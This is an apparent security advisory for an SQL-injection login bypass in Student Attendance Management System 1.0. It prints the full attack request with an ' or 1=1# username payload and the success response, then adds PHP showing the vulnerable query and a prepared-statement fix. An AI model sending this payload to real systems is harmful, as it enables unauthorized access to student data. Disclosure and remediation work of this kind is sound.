Student Attendance Management System-1.0 Bypass Authentication SQLi - latest version

2024.06.22
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: Student Attendance Management System-1.0 Bypass Authentication SQLi
## Author: nu11secur1ty
## Date: 06/22/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `username` parameter of the login form is not sanitized before it reaches the SQL query, so an attacker can inject SQL directly through the login form and bypass authentication for the admin account.

STATUS: CRITICAL - Vulnerability

[+] Exploits:

- Exploit:

```http
POST /student_attendance/ajax.php?action=login HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4
Content-Length: 104
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/student_attendance/login.php
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

username=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid
```

[+] Response

```http
HTTP/1.1 200 OK
Date: Sat, 22 Jun 2024 06:37:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

1
```

## Reproduce:
[href](https://www.patreon.com/posts/student-system-1-106665723)

## Proof and Exploit:
[href](https://www.patreon.com/posts/student-system-1-106665723)

## Time spent:
01:25:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
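The root cause described above is user input concatenated into the login query. The following PHP/MySQLi example is added here and is not the project's source: the vulnerable pattern is an illustrative reconstruction of the kind of code the advisory describes (assumed), and the hardened handler beside it shows the fix a maintainer would apply. The table name `users`, its columns, the `login_vulnerable`/`login_hardened` function names and the numeric status codes are all assumptions for this example.

```php
<?php
// Added example, not the project's code. Assumed schema (hypothetical):
//   users(id INT, username VARCHAR, password VARCHAR, type INT)

// VULNERABLE PATTERN (assumed reconstruction of the flaw the advisory reports):
// the username is spliced into the SQL text, so a value such as  x' or 1=1#
// rewrites the WHERE clause and the trailing # comments out the password check.
function login_vulnerable(mysqli $db, string $username, string $password): ?array
{
    $sql = "SELECT * FROM users WHERE username = '$username'"
         . " AND password = '" . md5($password) . "'";
    $res = $db->query($sql);
    if ($res === false) {
        return null;
    }
    return $res->fetch_assoc() ?: null;
}

// HARDENED: a prepared statement keeps the input out of the query text entirely,
// and the password is checked with password_verify() against a password_hash()
// value rather than being compared inside SQL.
function login_hardened(mysqli $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        "SELECT id, username, password, type FROM users WHERE username = ? LIMIT 1"
    );
    $stmt->bind_param("s", $username);   // bound as data, never as SQL
    $stmt->execute();
    $user = $stmt->get_result()->fetch_assoc();  // requires mysqlnd
    $stmt->close();

    // Same outcome for unknown user and wrong password: no account enumeration.
    if ($user === null || !password_verify($password, $user['password'])) {
        return null;
    }
    unset($user['password']);
    return $user;
}

// Entry point in the style of ajax.php?action=login (hypothetical wiring).
// Status codes 1 (success) and 3 (bad credentials) are assumed for this example.
function handle_login(mysqli $db): int
{
    session_start();
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';

    $user = login_hardened($db, $username, $password);
    if ($user === null) {
        error_log("failed login for username=" . json_encode($username)
                . " from " . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        return 3;
    }
    session_regenerate_id(true);          // fresh session id after auth
    $_SESSION['login_id']   = $user['id'];
    $_SESSION['login_type'] = $user['type'];
    return 1;
}

// $db = new mysqli('localhost', 'app_user', 'app_password', 'attendance_db');
// echo handle_login($db);
```

The logging line in `handle_login` records the raw submitted username, so an attempt like the one in the advisory (a quote followed by `or 1=1`) shows up verbatim in the application log, which is a cheap detection signal even after the query itself has been fixed.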


Copyright 2024, cxsecurity.com